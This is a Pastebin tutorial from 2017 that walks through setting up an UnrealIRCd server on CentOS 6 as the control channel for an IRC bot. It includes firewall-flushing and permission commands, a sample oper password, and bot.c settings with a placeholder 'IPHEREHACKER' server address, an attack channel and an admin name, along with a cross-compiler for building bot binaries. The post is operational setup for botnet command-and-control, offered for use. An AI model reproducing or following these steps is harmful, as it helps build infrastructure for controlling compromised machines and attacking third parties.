Advertisement
GodAres

[IRCTuT By Ares]

Jun 10th, 2017
535
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.04 KB | None | 0 0
  1. -------- ----------- ------------ ------------ ---- ---- ------------
  2. ******** *********** ************ ************ **** **** ************
  3. ---- ---- --- --- ------------ ---- ---- ------------
  4. **** ********* *** **** **** **** ****
  5. ---- --------- --- ---- ---- ---- ----
  6. **** **** **** *** **** ************ ****
  7. -------- ---- ---- ------------ ---- ------------ ----
  8. ******** **** **** ************ **** ************ ****
  9.  
  10. A Simple IRC tut by Ares :
  11.  
  12. Make sure its centOS 6
  13.  
  14. Files Needed, {
  15.  
  16. Unreal IRC.zip on my mega : http://www.megafileupload.com/1qonr/IRC.zip
  17. UnReal3.2
  18.  
  19. IRC bot
  20.  
  21. Cross-Compiler
  22.  
  23. }
  24.  
  25. dependencies, {
  26.  
  27. yum install gcc nano wget bzip2 perl perl-devel python gcc-c++
  28.  
  29. nano /usr/include/bits/typesizes.h
  30.  
  31. 999999
  32.  
  33. ulimit -n 999999
  34.  
  35. iptables -F
  36.  
  37. mkdir binaries
  38.  
  39. yum install make
  40.  
  41.  
  42. }
  43.  
  44. UnReal Folder {
  45.  
  46. nano unrealircd.conf
  47.  
  48. edit the listen block as ill show below joe
  49.  
  50. listen IP:6667; listen IP:874; listen IP:6969;
  51.  
  52. scroll down to where you see pissants now and change that to your user and pass as below
  53.  
  54. oper Ares {
  55. class clients;
  56. from {
  57. userhost *@*;
  58. };
  59. password "SwatBaby";
  60. flags
  61.  
  62. change all three or four to whatever user and pass you want
  63.  
  64. now save that and
  65.  
  66. chmod 777 *
  67.  
  68. ./Config
  69.  
  70. Let it compile (hit enter while you do a dab)
  71.  
  72. make
  73.  
  74. ./unreal start
  75.  
  76. }
  77.  
  78. Binaries {
  79.  
  80. cd binaries
  81.  
  82. place your bot and compiler in this folder
  83.  
  84. nano bot.c
  85.  
  86. // #### DEFAULT SETTINGS #### //
  87. int numservers=1;
  88. char *servers[] = {
  89. "IPHEREHACKER",
  90. (void*)0
  91. };
  92. static char *irc_port = ("6667");
  93. static char *irc_chan = ("#KUSH");
  94. char *admin = ("Ares");
  95. char *bot_prefix = ("[$]");
  96.  
  97. change to your pass at # define PASS ""
  98.  
  99. save it then compile.
  100.  
  101. open your irc via mIRC or smuxi or konversation whatever ya want Windows or Linux.
  102.  
  103. ARES IS OUT MY DUDES UNTIL I WRITE AGAIN
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement